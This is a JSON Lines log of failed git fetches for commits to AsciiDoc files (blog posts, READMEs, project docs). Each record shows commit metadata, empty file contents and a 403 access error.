{"commit":"bcd5c90680646b2bf8dd2225a6e769c8c62aaf14","subject":"Update 2016-10-07-Eureka-Server-DNS-based-peer-discovery-for-J-Hpster-Registry.adoc","message":"Update 2016-10-07-Eureka-Server-DNS-based-peer-discovery-for-J-Hpster-Registry.adoc","repos":"Brzhk\/Brzhk.github.io,Brzhk\/Brzhk.github.io,Brzhk\/Brzhk.github.io,Brzhk\/Brzhk.github.io","old_file":"_posts\/2016-10-07-Eureka-Server-DNS-based-peer-discovery-for-J-Hpster-Registry.adoc","new_file":"_posts\/2016-10-07-Eureka-Server-DNS-based-peer-discovery-for-J-Hpster-Registry.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Brzhk\/Brzhk.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b5fdc6a43cb8da2491ffd693a1dfe54a8a4f113a","subject":"Update 2018-10-21-.adoc","message":"Update 2018-10-21-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-10-21-.adoc","new_file":"_posts\/2018-10-21-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"45781689f6a0f096ee4b303ebc5279c45fb03d03","subject":"Update 2016-03-01-git.adoc","message":"Update 
2016-03-01-git.adoc","repos":"chbailly\/chbailly.github.io,chbailly\/chbailly.github.io,chbailly\/chbailly.github.io,chbailly\/chbailly.github.io","old_file":"_posts\/2016-03-01-git.adoc","new_file":"_posts\/2016-03-01-git.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/chbailly\/chbailly.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"18d7157897aa45189f90efb896c7d07c1a62ae24","subject":"Update 2017-10-15-Git.adoc","message":"Update 2017-10-15-Git.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-15-Git.adoc","new_file":"_posts\/2017-10-15-Git.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5f4bcc13dc51a79c4b30da3efcb114a033fe6823","subject":"Fix for Bug NMS-8194 - Part VII","message":"Fix for Bug NMS-8194 - Part VII\n\nAdding documentation for the rules about the HTTP return codes used on\nthe ReST API.\n","repos":"aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms","old_file":"opennms-doc\/guide-development\/src\/asciidoc\/text\/rest\/rest-api.adoc","new_file":"opennms-doc\/guide-development\/src\/asciidoc\/text\/rest\/rest-api.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/aihua\/opennms.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"002dc74b9a11cffae911314177115eb364e45c4b","subject":"Added Gzip Dataformat docs to Gitbook","message":"Added Gzip Dataformat docs to 
Gitbook\n","repos":"akhettar\/camel,bhaveshdt\/camel,yuruki\/camel,neoramon\/camel,jamesnetherton\/camel,hqstevenson\/camel,jkorab\/camel,salikjan\/camel,DariusX\/camel,tdiesler\/camel,nboukhed\/camel,chirino\/camel,hqstevenson\/camel,sverkera\/camel,scranton\/camel,isavin\/camel,davidkarlsen\/camel,anton-k11\/camel,w4tson\/camel,drsquidop\/camel,bhaveshdt\/camel,gnodet\/camel,curso007\/camel,zregvart\/camel,w4tson\/camel,JYBESSON\/camel,adessaigne\/camel,JYBESSON\/camel,Fabryprog\/camel,apache\/camel,anoordover\/camel,tlehoux\/camel,pax95\/camel,davidkarlsen\/camel,gilfernandes\/camel,drsquidop\/camel,veithen\/camel,jkorab\/camel,w4tson\/camel,pmoerenhout\/camel,anton-k11\/camel,hqstevenson\/camel,lburgazzoli\/camel,mgyongyosi\/camel,gilfernandes\/camel,snurmine\/camel,bgaudaen\/camel,tdiesler\/camel,scranton\/camel,mcollovati\/camel,nikhilvibhav\/camel,JYBESSON\/camel,chirino\/camel,RohanHart\/camel,dmvolod\/camel,veithen\/camel,pkletsko\/camel,gilfernandes\/camel,bhaveshdt\/camel,nikhilvibhav\/camel,NickCis\/camel,christophd\/camel,JYBESSON\/camel,apache\/camel,driseley\/camel,mgyongyosi\/camel,punkhorn\/camel-upstream,ssharma\/camel,akhettar\/camel,allancth\/camel,anoordover\/camel,snurmine\/camel,apache\/camel,kevinearls\/camel,jamesnetherton\/camel,Thopap\/camel,akhettar\/camel,onders86\/camel,jkorab\/camel,pax95\/camel,acartapanis\/camel,jonmcewen\/camel,jamesnetherton\/camel,scranton\/camel,gautric\/camel,CodeSmell\/camel,allancth\/camel,lburgazzoli\/apache-camel,objectiser\/camel,dmvolod\/camel,adessaigne\/camel,mcollovati\/camel,scranton\/camel,tlehoux\/camel,jamesnetherton\/camel,snurmine\/camel,gilfernandes\/camel,sabre1041\/camel,hqstevenson\/camel,jonmcewen\/camel,w4tson\/camel,nboukhed\/camel,sabre1041\/camel,prashant2402\/camel,jarst\/camel,bgaudaen\/camel,sabre1041\/camel,yuruki\/camel,Thopap\/camel,lburgazzoli\/camel,pax95\/camel,curso007\/camel,acartapanis\/camel,anoordover\/camel,akhettar\/camel,cunningt\/camel,sverkera\/camel,jarst\/camel,tadayosi\/camel,davidkarlsen\/camel,sverkera\/camel,chirino\/camel,gnodet\/camel,sverkera\/camel,isavin\/camel,alvinkwekel\/camel,onders86\/camel,punkhorn\/camel-upstream,mgyongyosi\/camel,drsquidop\/camel,bgaudaen\/camel,onders86\/camel,nboukhed\/camel,christophd\/camel,anoordover\/camel,lburgazzoli\/apache-camel,pkletsko\/camel,nicolaferraro\/camel,objectiser\/camel,ullgren\/camel,curso007\/camel,bhaveshdt\/camel,davidkarlsen\/camel,tkopczynski\/camel,chirino\/camel,sabre1041\/camel,tlehoux\/camel,pax95\/camel,mgyongyosi\/camel,DariusX\/camel,isavin\/camel,tlehoux\/camel,kevinearls\/camel,punkhorn\/camel-upstream,nicolaferraro\/camel,RohanHart\/camel,allancth\/camel,cunningt\/camel,alvinkwekel\/camel,salikjan\/camel,akhettar\/camel,RohanHart\/camel,tadayosi\/camel,cunningt\/camel,nboukhed\/camel,alvinkwekel\/camel,DariusX\/camel,sirlatrom\/camel,snurmine\/camel,lburgazzoli\/apache-camel,onders86\/camel,pkletsko\/camel,Thopap\/camel,NickCis\/camel,onders86\/camel,objectiser\/camel,pmoerenhout\/camel,tkopczynski\/camel,nikhilvibhav\/camel,prashant2402\/camel,anoordover\/camel,driseley\/camel,anton-k11\/camel,akhettar\/camel,driseley\/camel,driseley\/camel,nicolaferraro\/camel,pkletsko\/camel,lburgazzoli\/camel,acartapanis\/camel,driseley\/camel,JYBESSON\/camel,CodeSmell\/camel,neoramon\/camel,yuruki\/camel,jonmcewen\/camel,snurmine\/camel,w4tson\/camel,Fabryprog\/camel,nicolaferraro\/camel,christophd\/camel,dmvolod\/camel,allancth\/camel,rmarting\/camel,ssharma\/camel,jkorab\/camel,zregvart\/camel,lburgazzoli\/camel,Fabryprog\/camel,ul
lgren\/camel,NickCis\/camel,tdiesler\/camel,gautric\/camel,gilfernandes\/camel,allancth\/camel,neoramon\/camel,ssharma\/camel,acartapanis\/camel,tadayosi\/camel,bgaudaen\/camel,tkopczynski\/camel,NickCis\/camel,adessaigne\/camel,isavin\/camel,mgyongyosi\/camel,punkhorn\/camel-upstream,gautric\/camel,RohanHart\/camel,prashant2402\/camel,ullgren\/camel,tkopczynski\/camel,sirlatrom\/camel,prashant2402\/camel,ssharma\/camel,cunningt\/camel,veithen\/camel,NickCis\/camel,ssharma\/camel,CodeSmell\/camel,dmvolod\/camel,acartapanis\/camel,Fabryprog\/camel,tlehoux\/camel,gilfernandes\/camel,pkletsko\/camel,onders86\/camel,snurmine\/camel,objectiser\/camel,bgaudaen\/camel,jamesnetherton\/camel,dmvolod\/camel,jarst\/camel,acartapanis\/camel,w4tson\/camel,isavin\/camel,rmarting\/camel,jonmcewen\/camel,ullgren\/camel,yuruki\/camel,lburgazzoli\/apache-camel,sabre1041\/camel,rmarting\/camel,JYBESSON\/camel,pkletsko\/camel,tadayosi\/camel,apache\/camel,pmoerenhout\/camel,kevinearls\/camel,christophd\/camel,jamesnetherton\/camel,drsquidop\/camel,scranton\/camel,jarst\/camel,tadayosi\/camel,gnodet\/camel,kevinearls\/camel,anoordover\/camel,Thopap\/camel,sverkera\/camel,gnodet\/camel,dmvolod\/camel,sabre1041\/camel,jonmcewen\/camel,lburgazzoli\/camel,tlehoux\/camel,anton-k11\/camel,cunningt\/camel,pmoerenhout\/camel,chirino\/camel,zregvart\/camel,neoramon\/camel,tdiesler\/camel,RohanHart\/camel,christophd\/camel,bgaudaen\/camel,gautric\/camel,pax95\/camel,chirino\/camel,kevinearls\/camel,sirlatrom\/camel,pmoerenhout\/camel,jkorab\/camel,lburgazzoli\/camel,adessaigne\/camel,jkorab\/camel,driseley\/camel,neoramon\/camel,bhaveshdt\/camel,kevinearls\/camel,gautric\/camel,alvinkwekel\/camel,jarst\/camel,nboukhed\/camel,apache\/camel,apache\/camel,gnodet\/camel,curso007\/camel,hqstevenson\/camel,nboukhed\/camel,bhaveshdt\/camel,jonmcewen\/camel,anton-k11\/camel,sirlatrom\/camel,CodeSmell\/camel,veithen\/camel,sirlatrom\/camel,tdiesler\/camel,NickCis\/camel,tkopczynski\/camel,mcollovati\/camel,yuruki\/camel,tadayosi\/camel,anton-k11\/camel,lburgazzoli\/apache-camel,Thopap\/camel,cunningt\/camel,drsquidop\/camel,jarst\/camel,adessaigne\/camel,zregvart\/camel,adessaigne\/camel,isavin\/camel,allancth\/camel,curso007\/camel,ssharma\/camel,RohanHart\/camel,gautric\/camel,drsquidop\/camel,rmarting\/camel,mcollovati\/camel,veithen\/camel,christophd\/camel,pmoerenhout\/camel,Thopap\/camel,sverkera\/camel,rmarting\/camel,DariusX\/camel,nikhilvibhav\/camel,tkopczynski\/camel,lburgazzoli\/apache-camel,scranton\/camel,pax95\/camel,mgyongyosi\/camel,sirlatrom\/camel,rmarting\/camel,prashant2402\/camel,veithen\/camel,yuruki\/camel,prashant2402\/camel,neoramon\/camel,tdiesler\/camel,hqstevenson\/camel,curso007\/camel","old_file":"camel-core\/src\/main\/docs\/gzip-dataformat.adoc","new_file":"camel-core\/src\/main\/docs\/gzip-dataformat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/allancth\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b2ffb31528af5271dcbdced7a3623149584bdaf0","subject":"Update 2017-09-17-CSAW-CTF-2017-Qual-Baby-Crypt-crypto350.adoc","message":"Update 
2017-09-17-CSAW-CTF-2017-Qual-Baby-Crypt-crypto350.adoc","repos":"hva314\/blog,hva314\/blog,hva314\/blog,hva314\/blog","old_file":"_posts\/2017-09-17-CSAW-CTF-2017-Qual-Baby-Crypt-crypto350.adoc","new_file":"_posts\/2017-09-17-CSAW-CTF-2017-Qual-Baby-Crypt-crypto350.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hva314\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fa91811c6d129a394185b01fd490bf9c288ab7f2","subject":"Python: Calculating MD5 digest","message":"Python: Calculating MD5 digest\n","repos":"cmpitg\/programming-language-notes","old_file":"Python.adoc","new_file":"Python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"9add78206b5850d7f714f0dd37dcf8535b4b94a0","subject":"Fix blockquote style","message":"Fix blockquote style\n","repos":"cmpitg\/programming-language-notes","old_file":"Python.adoc","new_file":"Python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"1c49225e6c1c7c4a8839679aa94cff1ead1c5c83","subject":"Update 2017-04-26-Drift-Focus.adoc","message":"Update 2017-04-26-Drift-Focus.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2017-04-26-Drift-Focus.adoc","new_file":"_posts\/2017-04-26-Drift-Focus.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cf2b801b029e4f2870cf75bf31f07588fb28c13e","subject":"Update 2017-05-31-Java-types.adoc","message":"Update 2017-05-31-Java-types.adoc","repos":"nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io","old_file":"_posts\/2017-05-31-Java-types.adoc","new_file":"_posts\/2017-05-31-Java-types.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nilsonline\/nilsonline.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b4a747767874314591ecd6de1acc24cd6ad8b1bc","subject":"README.adoc (works this with github?)","message":"README.adoc (works this with github?)","repos":"BrunoEberhard\/minimal-j,BrunoEberhard\/minimal-j,BrunoEberhard\/minimal-j","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/BrunoEberhard\/minimal-j.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"acd6b3769762c5c48d8a6ac9c8e99f3b1b38b24e","subject":"Updated README credit URL","message":"Updated README credit URL\n\nNecessary to pick up new author profile URL.\n","repos":"bkuhlmann\/tokener,bkuhlmann\/tokener,bkuhlmann\/tokener","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/bkuhlmann\/tokener.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d2de1b4bf7bc0e26f1ab6b67fe25fc84f8fd15b9","subject":"README","message":"README\n","repos":"xbib\/content,xbib\/content","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xbib\/content.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b407b696e3c881c95781aca818abf19b09747f0c","subject":"Add link to new JSX demo.","message":"Add link to new JSX demo.\n","repos":"clara-labs\/react-popover,gregory90\/react-popover,littlebits\/react-popover","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/littlebits\/react-popover.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a9df3059cf4aab3139ce9b6c85458e4ea31a5a36","subject":"Update README","message":"Update README\n","repos":"pjanouch\/json-rpc-shell,pjanouch\/json-rpc-shell","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pjanouch\/json-rpc-shell.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"305051da4ace594a8cae6c9db3250b57d547b93a","subject":"Create README.adoc","message":"Create README.adoc","repos":"MCPH\/minecrafterph.github.io,MCPH\/minecrafterph.github.io,MCPH\/minecrafterph.github.io","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/MCPH\/minecrafterph.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4d392328e0b2676f0ac5ffb1077cfdcd155d60b3","subject":"Update 2015-07-11-Meet-the-Team-Meg.adoc","message":"Update 2015-07-11-Meet-the-Team-Meg.adoc","repos":"GWCATT\/gwcatt.github.io,GWCATT\/gwcatt.github.io,GWCATT\/gwcatt.github.io","old_file":"_posts\/2015-07-11-Meet-the-Team-Meg.adoc","new_file":"_posts\/2015-07-11-Meet-the-Team-Meg.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/GWCATT\/gwcatt.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"36cad8957992d51a3cf9d667fe67a44a353365ce","subject":"Update 2016-06-10-Log-Zoom-Filebeat.adoc","message":"Update 2016-06-10-Log-Zoom-Filebeat.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-10-Log-Zoom-Filebeat.adoc","new_file":"_posts\/2016-06-10-Log-Zoom-Filebeat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"60313eee2e5e9a375048624b3dcc46af812cf75a","subject":"Some general language fixes","message":"Some general language 
fixes\n","repos":"dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core","old_file":"trex_stateless.asciidoc","new_file":"trex_stateless.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"419c88b12ecc4c87006f48c0a6c1efd23cec6227","subject":"Update 2017-01-16-an-outsiders-perspective-of-UX-research-and-design.adoc","message":"Update 2017-01-16-an-outsiders-perspective-of-UX-research-and-design.adoc","repos":"gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io","old_file":"_posts\/2017-01-16-an-outsiders-perspective-of-UX-research-and-design.adoc","new_file":"_posts\/2017-01-16-an-outsiders-perspective-of-UX-research-and-design.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gudhakesa\/gudhakesa.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"680457a3d950f0fb24ddd1576ddba821c7bbc672","subject":"job #9198 draft implementation note","message":"job #9198 draft implementation note\n","repos":"xtuml\/bridgepoint,xtuml\/bridgepoint,xtuml\/bridgepoint,leviathan747\/bridgepoint,leviathan747\/bridgepoint,lwriemen\/bridgepoint,xtuml\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,leviathan747\/bridgepoint,cortlandstarrett\/bridgepoint,cortlandstarrett\/bridgepoint,cortlandstarrett\/bridgepoint,xtuml\/bridgepoint,leviathan747\/bridgepoint,lwriemen\/bridgepoint,leviathan747\/bridgepoint,cortlandstarrett\/bridgepoint,cortlandstarrett\/bridgepoint,leviathan747\/bridgepoint,lwriemen\/bridgepoint,xtuml\/bridgepoint,lwriemen\/bridgepoint,leviathan747\/bridgepoint,lwriemen\/bridgepoint,cortlandstarrett\/bridgepoint,leviathan747\/bridgepoint,xtuml\/bridgepoint,xtuml\/bridgepoint,lwriemen\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint","old_file":"doc-bridgepoint\/notes\/9198_unsaved_masl_buffer.int.adoc","new_file":"doc-bridgepoint\/notes\/9198_unsaved_masl_buffer.int.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xtuml\/bridgepoint.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6650daf302cbde903093172152547b3058d1c814","subject":"Changes based on feedback","message":"Changes based on 
feedback\n","repos":"jotak\/hawkular.github.io,objectiser\/hawkular.github.io,pilhuhn\/hawkular.github.io,lucasponce\/hawkular.github.io,jpkrohling\/hawkular.github.io,hawkular\/hawkular.github.io,pilhuhn\/hawkular.github.io,hawkular\/hawkular.github.io,jpkrohling\/hawkular.github.io,objectiser\/hawkular.github.io,lucasponce\/hawkular.github.io,jpkrohling\/hawkular.github.io,tsegismont\/hawkular.github.io,tsegismont\/hawkular.github.io,tsegismont\/hawkular.github.io,lucasponce\/hawkular.github.io,jotak\/hawkular.github.io,objectiser\/hawkular.github.io,jotak\/hawkular.github.io,pilhuhn\/hawkular.github.io,tsegismont\/hawkular.github.io,lucasponce\/hawkular.github.io,jpkrohling\/hawkular.github.io,jotak\/hawkular.github.io,hawkular\/hawkular.github.io,pilhuhn\/hawkular.github.io,objectiser\/hawkular.github.io,hawkular\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2016\/05\/24\/hawkular-btm-ticketmonster-demo.adoc","new_file":"src\/main\/jbake\/content\/blog\/2016\/05\/24\/hawkular-btm-ticketmonster-demo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d584290fd479d0780312c03fe9991d0f4d82f5de","subject":"Update and rename README.md to README.asciidoc","message":"Update and rename README.md to README.asciidoc\n\n\ngit-svn-id: 931ef96727c1945c41eec76d1319aea4c3c125f4@11238 6cd15df7-5b2d-4548-a7df-5dcce267a22b\n","repos":"tensorics\/tensorics-core","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tensorics\/tensorics-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"25b22a2cd47a64ad42b8d385b8aa927fb71cf38d","subject":"y2b create post The Invisible iPhone Button...","message":"y2b create post The Invisible iPhone Button...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-11-27-The%20Invisible%20iPhone%20Button....adoc","new_file":"_posts\/2017-11-27-The%20Invisible%20iPhone%20Button....adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bb9cc57a61593ad7af6164b9da06a5616b05e28a","subject":"Document blender to jmE via glTF","message":"Document blender to jmE via glTF\n","repos":"jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org","old_file":"src\/docs\/asciidoc\/jme3\/advanced\/blender_gltf.adoc","new_file":"src\/docs\/asciidoc\/jme3\/advanced\/blender_gltf.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jMonkeyEngine\/wiki.jmonkeyengine.org.git\/': The requested URL returned error: 403\n","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"5c3e179aef55392a0cb69035bb05b4878bf81d20","subject":"updates release notes pointers for stateless","message":"updates release notes pointers for stateless\n\nSigned-off-by: imarom 
<4fa0e965a175bd1cef6459ed7c388bf7ff953a09@cisco.com>\n","repos":"dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core","old_file":"doc\/release_notes.asciidoc","new_file":"doc\/release_notes.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"13cf40f00b40b41dc6de7d28b6547ccedee4af1b","subject":"Updated README","message":"Updated README\n","repos":"sebhaub\/chronix.spark,sebhaub\/chronix.spark,ChronixDB\/chronix.spark,ChronixDB\/chronix.spark","old_file":"solr-cloud\/README.adoc","new_file":"solr-cloud\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ChronixDB\/chronix.spark.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"11cfc8d9d114c6d3b242b213bad6183dfa67d409","subject":"Update 2015-09-01-Episode-20-Forum-Questions-Part-2.adoc","message":"Update 2015-09-01-Episode-20-Forum-Questions-Part-2.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2015-09-01-Episode-20-Forum-Questions-Part-2.adoc","new_file":"_posts\/2015-09-01-Episode-20-Forum-Questions-Part-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"8af7c2e792d44b0ecde3f51f2ce7f9bce473fc12","subject":"y2b create post Is This The World's Weirdest Mouse?","message":"y2b create post Is This The World's Weirdest Mouse?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-07-05-Is-This-The-Worlds-Weirdest-Mouse.adoc","new_file":"_posts\/2016-07-05-Is-This-The-Worlds-Weirdest-Mouse.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"0332b33725cb59e471ff46031a028a28cf128cc8","subject":"Update 2016-10-29-An-Easy-Way-to-Understand-Quaternion-and-Rotation-Part-1-Theory.adoc","message":"Update 2016-10-29-An-Easy-Way-to-Understand-Quaternion-and-Rotation-Part-1-Theory.adoc","repos":"lxjk\/lxjk.github.io,lxjk\/lxjk.github.io,lxjk\/lxjk.github.io,lxjk\/lxjk.github.io","old_file":"_posts\/2016-10-29-An-Easy-Way-to-Understand-Quaternion-and-Rotation-Part-1-Theory.adoc","new_file":"_posts\/2016-10-29-An-Easy-Way-to-Understand-Quaternion-and-Rotation-Part-1-Theory.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lxjk\/lxjk.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"0cbb3e419c3426f4cf287cf8510e82ad838ad7c6","subject":"Update 2016-05-23-Models-are-pointers.adoc","message":"Update 2016-05-23-Models-are-pointers.adoc","repos":"topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io","old_file":"_posts\/2016-05-23-Models-are-pointers.adoc","new_file":"_posts\/2016-05-23-Models-are-pointers.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/topicusonderwijs\/topicusonderwijs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"ceebcf46b1a8a9a19e15acce844b18769264de4c","subject":"Update 2017-01-23-Test.adoc","message":"Update 2017-01-23-Test.adoc","repos":"OlympusOnline2\/announcements,OlympusOnline2\/announcements,OlympusOnline2\/announcements,OlympusOnline2\/announcements","old_file":"_posts\/2017-01-23-Test.adoc","new_file":"_posts\/2017-01-23-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/OlympusOnline2\/announcements.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"55610f2ec2098866aada2633270c217a6663f782","subject":"Publish 2016-6-25-Git-one.adoc","message":"Publish 2016-6-25-Git-one.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-25-Git-one.adoc","new_file":"2016-6-25-Git-one.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
